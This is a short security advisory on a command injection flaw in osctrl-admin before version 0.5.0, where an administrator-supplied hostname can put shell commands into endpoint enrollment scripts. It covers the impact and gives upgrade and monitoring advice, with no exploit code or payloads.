osctrl OS Command Injection Vulnerability in Admin Environment Configuration Allowing Remote Code Execution

A command injection vulnerability allowing remote code execution has been identified in osctrl versions prior to 0.5.0. This issue resides in the osctrl-admin environment configuration, where an authenticated administrator can inject arbitrary shell commands through the hostname parameter while creating or editing environments. The injected commands are incorporated into enrollment scripts that execute on endpoints using the compromised environment, with commands running as root or SYSTEM before osquery is installed, leaving no audit trail. This vulnerability could lead to unauthorized access, credential theft, and complete compromise of the affected endpoints.

Impact

Exploitation of this vulnerability allows for remote code execution on all endpoints that enroll using the compromised environment, with commands executed as root or SYSTEM.

Remediation

Users are advised to upgrade to osctrl version 0.5.0 or later. It is also recommended to restrict osctrl administrator access to trusted personnel, review existing environment configurations for suspicious hostnames, and monitor enrollment scripts for unexpected commands.